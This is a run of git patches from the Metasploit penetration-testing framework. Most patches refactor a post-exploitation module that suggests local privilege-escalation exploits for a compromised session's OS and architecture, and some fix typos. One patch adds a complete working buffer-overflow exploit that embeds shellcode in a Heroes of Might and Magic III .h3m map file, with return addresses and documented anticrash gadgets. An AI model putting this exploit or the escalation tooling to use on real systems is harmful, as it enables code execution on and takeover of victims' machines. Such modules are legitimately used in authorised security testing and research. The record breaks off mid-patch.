-          elsif value =~ /^http:\/\/wpvulndb\.com\/vulnerabilities\//
+          elsif value =~ /^https:\/\/wpvulndb\.com\/vulnerabilities\//
             warn("Please use 'WPVDB' for '#{value}'")
           end
         end

From 7aa78dfd4e53f0604b4f40c337fab1e7ac656f62 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Thu, 30 Jul 2015 09:36:02 -0500
Subject: [PATCH 0904/1013] Revamped os, platform, arch detection. Added count
 for exploits being tried

---
 .../multi/recon/local_exploit_suggestor.rb    | 60 ++++++++++++-------
 1 file changed, 37 insertions(+), 23 deletions(-)

diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
index c61f336c86..15444782cd 100644
--- a/modules/post/multi/recon/local_exploit_suggestor.rb
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -37,6 +37,7 @@ class Metasploit3 < Msf::Post
   end
 
 
+
   def all_platforms
     Msf::Module::Platform.subclasses.collect {|c| c.realname.downcase }
   end
@@ -44,16 +45,19 @@ class Metasploit3 < Msf::Post
 
   def get_target_arch
     @target_arch ||= lambda {
-      return nil unless session
-      session.platform.split('/').first
+      return '' unless session
+      arch = ''
+      arch = session.platform.split('/').first if session.platform.include?('/')
+      return '' if ARCH_TYPES.include?(arch)
+      return arch
     }.call
   end
 
 
   def get_target_platform
     @target_platform ||= lambda {
-      return nil unless session
-      platform = session.platform.split('/').second
+      return '' unless session
+      platform = session.platform.include?('/') ? session.platform.split('/').second : session.platform
 
       if platform =~ /^win/
         platform = 'win'
@@ -69,15 +73,18 @@ class Metasploit3 < Msf::Post
     mod_arch.include?(get_target_arch)
   end
 
+
   def is_module_options_ready?(mod)
     mod.options.each_pair do |option_name, option|
       if option.required && option.default.nil? && mod.datastore[option_name].blank?
         return false
       end
     end
+
     true
   end
 
+
   def is_module_platform?(mod)
     platform_obj = nil
     begin
@@ -86,15 +93,18 @@ class Metasploit3 < Msf::Post
       # When not found, find_platform raises an ArgumentError
       return false
     end
+
     module_platforms = mod.target.platform ? mod.target.platform.platforms : mod.platform.platforms
     module_platforms.include?(platform_obj)
   end
 
+
   def set_module_options(mod)
     mod.datastore.merge!(self.datastore)
     mod.datastore['SESSION'] = session.sid if !mod.datastore['SESSION'] && session
   end
 
+
   def setup
     print_status "Collecting local exploits..."
     #Initializes an array
@@ -104,17 +114,22 @@ class Metasploit3 < Msf::Post
       mod = framework.exploits.create(name)
       next unless mod
       set_module_options(mod)
-        if mod.kind_of?(Msf::Exploit::Local) &&
-          mod.respond_to?(:check)  &&
+       if mod.kind_of?(Msf::Exploit::Local) &&
+          mod.respond_to?(:check) &&
           is_module_platform?(mod) &&
-          is_module_arch?(mod) &&
           is_module_options_ready?(mod)
-         @local_exploits << mod
-        end
-      end
+          if !get_target_arch.empty? && is_module_arch?(mod)
+            @local_exploits << mod
+          else
+            @local_exploits << mod
+          end
+       end
+     end
   end
 
+
   def run
+    print_status("Number of exploits being tried: #{@local_exploits.length}")
     @local_exploits.each do |m|
     begin
       checkcode = m.check
@@ -125,22 +140,21 @@ class Metasploit3 < Msf::Post
           #If the datastore option is true, a detailed description will show
           if datastore['ShowDescription']
             # Formatting for the description text
-            print_line("\n")
             print_line Rex::Text.wordwrap(Rex::Text.compress(m.description), 2, 70)
-          end
+            end
           else
             # Prints the full name and the checkcode message for the exploit
             vprint_status("#{m.fullname}: #{checkcode.second}")
           end
      # Creates a log record in framework.log
-        rescue ::Exception => e
-          elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-          vprint_error("#{m.shortname} failled to run: #{e.message}")
-        end
-      end
-        if @local_exploits.length < 1
-          print_error "No suggestions available. "
-        end
+     rescue Rex::Post::Meterpreter::RequestError => e
+       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+       vprint_error("#{e.class} #{m.shortname} failled to run: #{e.message}")
+     end
+     if @local_exploits.length < 1
+       print_error "No suggestions available. "
+     end
+    end
   end
 
   def is_check_interesting?(checkcode)
@@ -152,14 +166,14 @@ class Metasploit3 < Msf::Post
   end
 
   def print_status(msg='')
-    super("#{session.sock.peerhost} - #{msg}")
+    super("#{session.session_host} - #{msg}")
   end
 
   def print_good(msg='')
-    super("#{session.sock.peerhost} - #{msg}")
+    super("#{session.session_host} - #{msg}")
   end
 
   def print_error(msg='')
-    super("#{session.sock.peerhost} - #{msg}")
+    super("#{session.session_host} - #{msg}")
   end
 end

From af55ef7352c8695171ea3ef60df3a759f2dbdda8 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Thu, 30 Jul 2015 10:10:42 -0500
Subject: [PATCH 0905/1013] Added session.present?

---
 modules/post/multi/recon/local_exploit_suggestor.rb | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
index 15444782cd..38b91bda04 100644
--- a/modules/post/multi/recon/local_exploit_suggestor.rb
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Post
 
   def initialize(info={})
     super(update_info(info,
-        'Name'          => 'Multi Recon Local Exploit Suggestor',
+        'Name'          => 'Multi Recon Local Exploit Suggester',
         'Description'   => %q{
           This module suggests local meterpreter exploits that can be used. The
           exploits are suggested based on the architecture and platform that
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post
 
           It's important to note that not all local exploits will be fired. For
           example, if a module doesn't have a default datastore option that is
-          required for it to run, then it will not come up in the suggestor's
+          required for it to run, then it will not come up in the suggester's
           results.
         },
         'License'       => MSF_LICENSE,
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
 
   def get_target_arch
     @target_arch ||= lambda {
-      return '' unless session
+      return '' unless session.present?
       arch = ''
       arch = session.platform.split('/').first if session.platform.include?('/')
       return '' if ARCH_TYPES.include?(arch)
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Post
 
   def get_target_platform
     @target_platform ||= lambda {
-      return '' unless session
+      return '' unless session.present?
       platform = session.platform.include?('/') ? session.platform.split('/').second : session.platform
 
       if platform =~ /^win/
@@ -101,7 +101,9 @@ class Metasploit3 < Msf::Post
 
   def set_module_options(mod)
     mod.datastore.merge!(self.datastore)
-    mod.datastore['SESSION'] = session.sid if !mod.datastore['SESSION'] && session
+    if !mod.datastore['SESSION'] && session.present?
+      mod.datastore['SESSION'] = session.sid
+    end
   end
 
 

From 08338b73b2f209592d8fa223c5974c4a73e70a77 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 30 Jul 2015 18:26:41 -0500
Subject: [PATCH 0906/1013] Add get_target_arch and get_target_os

We cannot use session.platform to fingerprint the target's platform
and arch, because it's not really meant to be used that way.
---
 lib/msf/core/post/common.rb                   | 103 +++++++++++++++
 .../multi/recon/local_exploit_suggestor.rb    | 122 +++++++++---------
 2 files changed, 166 insertions(+), 59 deletions(-)

diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index 7f4db478d9..d15134f4ca 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -49,6 +49,74 @@ module Msf::Post::Common
     pid_list.include?(pid)
   end
 
+
+  # Returns the target architecture.
+  # You should use this instead of session.platform, because of the following reasons:
+  # 1. session.platform doesn't always give you an arch. For example: a shell session.
+  # 2. session.platform doesn't mean the target platform/arch, it means whatever the session is.
+  #    For example: you can use a python meterpreter on a Windows platform, and you will
+  #    get 'python/python' as your arch/platform, and not 'x86/win32'.
+  #
+  # @returns [String] The archtecture recognizable by framework's ARCH_TYPES.
+  def get_target_arch
+    arch = nil
+
+    case session.type
+    when 'meterpreter'
+      arch = get_recognizable_arch(client.sys.config.sysinfo['Architecture'])
+    when 'shell'
+      if session.platform =~ /win/
+        arch = get_recognizable_arch(get_env('PROCESSOR_ARCHITECTURE').strip)
+      else
+        arch = get_recognizable_arch(get_env('MACHTYPE').strip)
+      end
+    end
+
+    arch
+  end
+
+
+  # Returns the target OS.
+  # You should use this instead of session.platform, because of the following reasons:
+  # 1. session.platform doesn't always provide a consistent OS name. For example: for a Windows
+  #    target, session.platform might return 'win32', which isn't recognized by Msf::Module::Platform.
+  # 2. session.platform doesn't mean the target platform/arch, it means whatever the session is.
+  #    For example: You can use a python meterpreter on a Windows platform, and you will get
+  #    'python/python', as your arch/platform, and not 'windows'.
+  #
+  # @return [String] The OS name recognizable by Msf::Module::Platform.
+  def get_target_os
+    os = nil
+    info = ''
+
+    case session.type
+    when 'meterpreter'
+      info = client.sys.config.sysinfo['OS']
+    when 'shell'
+      if session.platform =~ /win/
+        info = get_env('OS').strip
+      else
+        info = cmd_exec('uname -s').strip
+      end
+    end
+
+    case info
+    when /windows/i
+      os = Msf::Module::Platform::Windows.realname.downcase
+    when /darwin/i
+      os = Msf::Module::Platform::OSX.realname.downcase
+    when /freebsd/i
+      os = Msf::Module::Platform::FreeBSD.realname.downcase
+    when /GENERIC\.MP/i, /netbsd/i
+      os =  Msf::Module::Platform::BSD.realname.downcase
+    else
+      os = Msf::Module::Platform::Linux.realname.downcase
+    end
+
+
+    os
+  end
+
   #
   # Executes +cmd+ on the remote system
   #
@@ -216,5 +284,40 @@ module Msf::Post::Common
     nil
   end
 
+  private
+
+  # Returns an architecture recognizable by ARCH_TYPES.
+  #
+  # @param [String] target_arch The arch. Example: x86
+  # @return [String] One of the archs from ARCH_TYPES.
+  def get_recognizable_arch(target_arch)
+    arch = nil
+
+    # Special handle some cases that ARCH_TYPES won't recognize.
+    # https://msdn.microsoft.com/en-us/library/aa384274.aspx
+    case target_arch
+    when /i386/, /i686/
+      return ARCH_X86
+    when /amd64/i, /ia64/i
+      return ARCH_X86_64
+    end
+
+    # Rely on ARCH_TYPES to tell us a framework-recognizable ARCH.
+    # Notice we're sorting ARCH_TYPES first, so that the longest string
+    # goes first. This step is used because sometimes let's say if the target
+    # is 'x86_64', and if the ARCH_X86 kicks in first, then we will get 'x86'
+    # instead of x86_64, which is inaccurate.
+    recognizable_archs = ARCH_TYPES
+    recognizable_archs = recognizable_archs.sort_by {|a| a.length}.reverse
+    recognizable_archs.each do |a|
+      if target_arch =~ /#{a}/
+        arch = a
+        break
+      end
+    end
+
+    arch
+  end
+
 end
 
diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
index 15444782cd..b105ef2d33 100644
--- a/modules/post/multi/recon/local_exploit_suggestor.rb
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -17,54 +17,35 @@ class Metasploit3 < Msf::Post
           meterpreter. Additionally, the ShowDescription option can be set
           to 'true' to a detailed description on the suggested exploits.
 
-          It's important to note that not all local exploits will be fired. For
-          example, if a module doesn't have a default datastore option that is
-          required for it to run, then it will not come up in the suggestor's
-          results.
+          It's important to note that not all local exploits will be fired.
+          They are chosen based on these conditions: session type,
+          platform, architecture, and required default options.
         },
         'License'       => MSF_LICENSE,
-        'Author'        => [ 'sinn3r',
-                             'Mo'
-                           ],
+        'Author'        => [ 'sinn3r', 'Mo' ],
         'Platform'      => all_platforms,
         'SessionTypes'  => [ 'meterpreter', 'shell' ]
     ))
 
     register_options([
       Msf::OptInt.new('SESSION', [ true, "The session to run this module on." ]),
-      Msf::OptBool.new('ShowDescription', [true, "Displays a detailed description for the available exploits", false])
+      Msf::OptBool.new('SHOWDESCRIPTION', [true, "Displays a detailed description for the available exploits", false])
     ],Msf::Post)
   end
 
 
-
   def all_platforms
     Msf::Module::Platform.subclasses.collect {|c| c.realname.downcase }
   end
 
 
   def get_target_arch
-    @target_arch ||= lambda {
-      return '' unless session
-      arch = ''
-      arch = session.platform.split('/').first if session.platform.include?('/')
-      return '' if ARCH_TYPES.include?(arch)
-      return arch
-    }.call
+    @target_arch ||= super
   end
 
 
-  def get_target_platform
-    @target_platform ||= lambda {
-      return '' unless session
-      platform = session.platform.include?('/') ? session.platform.split('/').second : session.platform
-
-      if platform =~ /^win/
-        platform = 'win'
-      end
-
-      return platform
-    }.call
+  def get_target_os
+    @target_os ||= super
   end
 
 
@@ -88,9 +69,10 @@ class Metasploit3 < Msf::Post
   def is_module_platform?(mod)
     platform_obj = nil
     begin
-      platform_obj = Msf::Module::Platform.find_platform(get_target_platform)
-    rescue ArgumentError
+      platform_obj = Msf::Module::Platform.find_platform(get_target_os)
+    rescue ArgumentError => e
       # When not found, find_platform raises an ArgumentError
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
       return false
     end
 
@@ -99,64 +81,82 @@ class Metasploit3 < Msf::Post
   end
 
 
+  def is_session_type_compat?(mod)
+    mod.session_compatible?(session.sid)
+  end
+
+
   def set_module_options(mod)
     mod.datastore.merge!(self.datastore)
     mod.datastore['SESSION'] = session.sid if !mod.datastore['SESSION'] && session
   end
 
 
+  def is_module_wanted?(mod)
+    (
+      mod.kind_of?(Msf::Exploit::Local) &&
+      mod.respond_to?(:check) &&
+      is_session_type_compat?(mod) &&
+      is_module_platform?(mod) &&
+      is_module_arch?(mod) &&
+      is_module_options_ready?(mod)
+    )
+  end
+
+
   def setup
-    print_status "Collecting local exploits..."
-    #Initializes an array
+    print_status "Collecting local exploits for #{get_target_arch}/#{get_target_os}..."
+    # Initializes an array
     @local_exploits = []
     # Collects exploits into an array
     framework.exploits.each do |name, obj|
       mod = framework.exploits.create(name)
       next unless mod
       set_module_options(mod)
-       if mod.kind_of?(Msf::Exploit::Local) &&
-          mod.respond_to?(:check) &&
-          is_module_platform?(mod) &&
-          is_module_options_ready?(mod)
-          if !get_target_arch.empty? && is_module_arch?(mod)
-            @local_exploits << mod
-          else
-            @local_exploits << mod
-          end
-       end
-     end
+      @local_exploits << mod if is_module_wanted?(mod)
+    end
+  end
+
+  def show_found_exploits
+    print_status("The following #{@local_exploits.length} exploit checks are being tried:")
+    @local_exploits.each do |x|
+      vprint_status(x.fullname)
+    end
   end
 
 
   def run
-    print_status("Number of exploits being tried: #{@local_exploits.length}")
+    if @local_exploits.length < 1
+      print_error "No suggestions available."
+      return
+    end
+
+    show_found_exploits
+
     @local_exploits.each do |m|
-    begin
-      checkcode = m.check
+      begin
+        checkcode = m.check
         # See def is_check_interesting?
         if is_check_interesting?(checkcode)
           # Prints the full name and the checkcode message for the exploit
           print_good("#{m.fullname}: #{checkcode.second}")
-          #If the datastore option is true, a detailed description will show
-          if datastore['ShowDescription']
+          # If the datastore option is true, a detailed description will show
+          if datastore['SHOWDESCRIPTION']
             # Formatting for the description text
             print_line Rex::Text.wordwrap(Rex::Text.compress(m.description), 2, 70)
-            end
-          else
-            # Prints the full name and the checkcode message for the exploit
-            vprint_status("#{m.fullname}: #{checkcode.second}")
           end
-     # Creates a log record in framework.log
-     rescue Rex::Post::Meterpreter::RequestError => e
-       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-       vprint_error("#{e.class} #{m.shortname} failled to run: #{e.message}")
-     end
-     if @local_exploits.length < 1
-       print_error "No suggestions available. "
-     end
+        else
+          vprint_status("#{m.fullname}: #{checkcode.second}")
+        end
+      rescue Rex::Post::Meterpreter::RequestError => e
+        # Creates a log record in framework.log
+        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+        vprint_error("#{e.class} #{m.shortname} failled to run: #{e.message}")
+      end
     end
   end
 
+
   def is_check_interesting?(checkcode)
     [
       Msf::Exploit::CheckCode::Vulnerable,
@@ -165,15 +165,19 @@ class Metasploit3 < Msf::Post
     ].include?(checkcode)
   end
 
+
   def print_status(msg='')
     super("#{session.session_host} - #{msg}")
   end
 
+
   def print_good(msg='')
     super("#{session.session_host} - #{msg}")
   end
 
+
   def print_error(msg='')
     super("#{session.session_host} - #{msg}")
   end
+
 end

From 34279776a6fccaf184c6b7213152c385346e75cb Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 30 Jul 2015 18:40:41 -0500
Subject: [PATCH 0907/1013] Minor edit

---
 modules/post/multi/recon/local_exploit_suggestor.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
index 8b5ea8d53c..64962b4ac6 100644
--- a/modules/post/multi/recon/local_exploit_suggestor.rb
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -120,7 +120,11 @@ class Metasploit3 < Msf::Post
   end
 
   def show_found_exploits
-    print_status("The following #{@local_exploits.length} exploit checks are being tried:")
+    if datastore['VERBOSE']
+      print_status("The following #{@local_exploits.length} exploit checks are being tried:")
+    else
+      print_status("#{@local_exploits.length} exploit checks are being tried...")
+    end
     @local_exploits.each do |x|
       vprint_status(x.fullname)
     end

From fdb2b008f9747c98520e0a02acdc7a1ca2b99828 Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Fri, 31 Jul 2015 02:23:19 -0300
Subject: [PATCH 0908/1013] Fix a small typo - OSVDB instead of OSVBD.

---
 .../scanner/http/manageengine_deviceexpert_user_creds.rb        | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb
index ba99b597ce..9748b7f676 100644
--- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb
+++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           ['EDB', '34449'],
-          ['OSVBD', '110522'],
+          ['OSVDB', '110522'],
           ['CVE', '2014-5377']
         ],
       'DisclosureDate' => 'Aug 28 2014'))

From d4c8d5884cdf883dda881102a8aefd98369db476 Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Fri, 31 Jul 2015 11:47:46 -0700
Subject: [PATCH 0909/1013] Fix a small typo

---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index c29b58d65c..d580f94d13 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -789,7 +789,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   #
-  # Loads a fiile
+  # Loads a file
   #
   def read_file(fname)
     buf = ''

From 12a6bdb67b17d4db3287f1b665916210481d1278 Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Fri, 31 Jul 2015 02:06:47 -0700
Subject: [PATCH 0910/1013] Add Heroes of Might and Magic III .h3m map file
 Buffer Overflow module

---
 .../exploits/windows/fileformat/homm3_h3m.rb  | 175 ++++++++++++++++++
 1 file changed, 175 insertions(+)
 create mode 100644 modules/exploits/windows/fileformat/homm3_h3m.rb

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
new file mode 100644
index 0000000000..ab5307e502
--- /dev/null
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -0,0 +1,175 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'enumerator'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
+      'Description'    => %q{
+          This module embeds an exploit into an ucompressed map file (.h3m) for
+        Heroes of Might and Magic III. Once the map is started in-game, a
+        buffer overflow occuring when loading object sprite names leads to
+        shellcode execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pierre Lindblad', # Vulnerability discovery
+          'John AAkerblom'   # Vulnerability discovery, PoC and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '37716' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [
+            'H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
+            {
+              'Anticrash1' => 0x004497D4,
+              'Anticrash2' => 0x006A6430,
+              'Ret' => 0x004EFF87, # CALL [ESP] Heroes3.exe
+            }
+          ],
+          [
+            'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
+            {
+              'Anticrash1' => 0x00456A48,
+              'Anticrash2' => 0x006A6830,
+              'Ret' => 0x00580C0F, # CALL [ESP] Heroes3 HD.exe
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jul 29 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME',
+                      [
+                        false,
+                        'If file exists, exploit will be embedded' \
+                          ' into it. If not, a new default h3m file where' \
+                          ' it will be embedded will be created.',
+                        'sploit.h3m'
+                      ])
+      ], self.class)
+  end
+
+  def exploit
+    buf = ''
+
+    # Load h3m into buffer from uncompressed .h3m on disk/default data
+    begin
+      buf << read_file(datastore['FILENAME'])
+      print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
+    rescue
+      print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
+        'default .h3m data')
+      buf << make_default_h3m
+    end
+
+    # Find the object attributes array in the file by searching for a sprite name that occurs
+    # as the first game object in all maps.
+    objects_pos = buf.index('AVWmrnd0.def')
+    if objects_pos.nil?
+      print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
+        '. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')
+      return
+    end
+
+    # Entries in the objects array start with a string size followed by game sprite name string
+    # Move back 4 bytes from the first sprite name to get to the start of the objects array
+    objects_pos -= 4
+
+    print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)
+
+    # Construct a malicious object entry with a big size, where the sprite name starts
+    # with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
+    # but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
+    # After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
+    # overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
+    # it returns to the CALL ESP-gadget are required for the game not to crash before returning.
+    size = 144 + payload.encoded.size
+    exp = ''
+    exp << [size].pack('V')
+    exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
+    exp << rand_text(121)
+    exp << [target.ret].pack('V')
+    exp << [target['Anticrash1']].pack('V')
+    exp << [target['Anticrash2']].pack('V')
+    exp << payload.encoded
+
+    # Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
+    from = objects_pos
+    to = from + size
+    buf[from..to] = exp
+    print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)
+
+    # Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
+    file_create(buf)
+  end
+
+  def substring_pos(string, substring)
+    string.enum_for(:scan, substring).map { $~.offset(0)[0] }
+  end
+
+  #
+  # Loads a file
+  #
+  def read_file(fname)
+    buf = ''
+    ::File.open(fname, 'rb') do |f|
+      buf << f.read
+    end
+
+    buf
+  end
+
+  #
+  # Returns data for a minimimum required S size h3m map containing 2 players
+  #
+  def make_default_h3m
+    buf = ''
+
+    # Set map specifications to 36x36 (0x24000000) map with 2 players, with
+    # default/no settings for name, description, victory condition etc
+    buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
+    buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
+    buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
+    buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
+    buf << "\x00\x00\xff\xff\xff\x00"
+    buf << "\xFF" * 16
+    buf << "\x00" * 35
+
+    # Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
+    buf << "\x00" * (36 * 36 * 7)
+
+    # Set object attribute array count to 1
+    buf << "\x01\x00\x00\x00"
+
+    # Size of first sprite name, this will be overwritten
+    buf << "\x12\x34\x56\x78"
+
+    # Standard name for first object, which will be searched for
+    buf << 'AVWmrnd0.def'
+
+    buf
+  end
+end
\ No newline at end of file

From 013201bd99b01c91468710335c5ec1c83eb8a000 Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Fri, 31 Jul 2015 13:49:27 -0700
Subject: [PATCH 0911/1013] remove unneeded require

---
 modules/exploits/windows/fileformat/homm3_h3m.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index ab5307e502..4682a3d5bd 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -4,7 +4,6 @@
 ##
 
 require 'msf/core'
-require 'enumerator'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking

From 6671df6672599275a60603f741409b6e21c82f27 Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Fri, 31 Jul 2015 13:53:56 -0700
Subject: [PATCH 0912/1013] add documentation

---
 .../exploits/windows/fileformat/homm3_h3m.rb  | 25 +++++++++++++++++++
 1 file changed, 25 insertions(+)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index 4682a3d5bd..75b8facb0e 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -39,7 +39,32 @@ class Metasploit3 < Msf::Exploit::Remote
           [
             'H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
             {
+              # Two "Anticrash"-gadgets are needed or the game will crash before ret
+              #
+              # Anticrash1, needs to pass the following code down to final JMP:
+              # MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
+              # XOR EBX, EBX
+              # CMP EAX, EBX
+              # JE SHORT <crash spot> ; JMP to crash if EAX is 0
+              # MOV CL, BYTE PTR DS : [EAX - 1]
+              # CMP CL, BL
+              # JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
+              # CMP CL, 0FF
+              # JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
+              # CMP EDI, EBX
+              # JNE <good spot> ; JMP to good spot. Always occurs if we get this far
+              #
+              # Summary: An address which when incremented by 4 and then dereferenced
+              # leads to for example a string which is preceeded neither by a 0x00 or 0xFF
               'Anticrash1' => 0x004497D4,
+              # Anticrash2, needs to return out of the following call (tricky):
+              #
+              # MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
+              # CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
+              #
+              # Summary: An address which when dereferenced leads to an address that
+              # when incremented by 4 and then deferenced leads to a function returning
+              # without accessing any registers/memory that would cause a crash.
               'Anticrash2' => 0x006A6430,
               'Ret' => 0x004EFF87, # CALL [ESP] Heroes3.exe
             }

From 6fdd2f91ceed21e481f9c278bee3a6778aa77d19 Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Fri, 31 Jul 2015 13:54:29 -0700
Subject: [PATCH 0913/1013] rescue only Errno::ENOENT

---
 modules/exploits/windows/fileformat/homm3_h3m.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index 75b8facb0e..bad1b3706e 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
       buf << read_file(datastore['FILENAME'])
       print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
-    rescue
+    rescue Errno::ENOENT
       print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
         'default .h3m data')
       buf << make_default_h3m

From 66c92aae5df3d034d259ff72bd0f90c824cdcef3 Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Fri, 31 Jul 2015 17:12:50 -0700
Subject: [PATCH 0914/1013] fix documentation

---
 modules/exploits/windows/fileformat/homm3_h3m.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index bad1b3706e..c13eabeb0d 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
               # when incremented by 4 and then deferenced leads to a function returning
               # without accessing any registers/memory that would cause a crash.
               'Anticrash2' => 0x006A6430,
-              'Ret' => 0x004EFF87, # CALL [ESP] Heroes3.exe
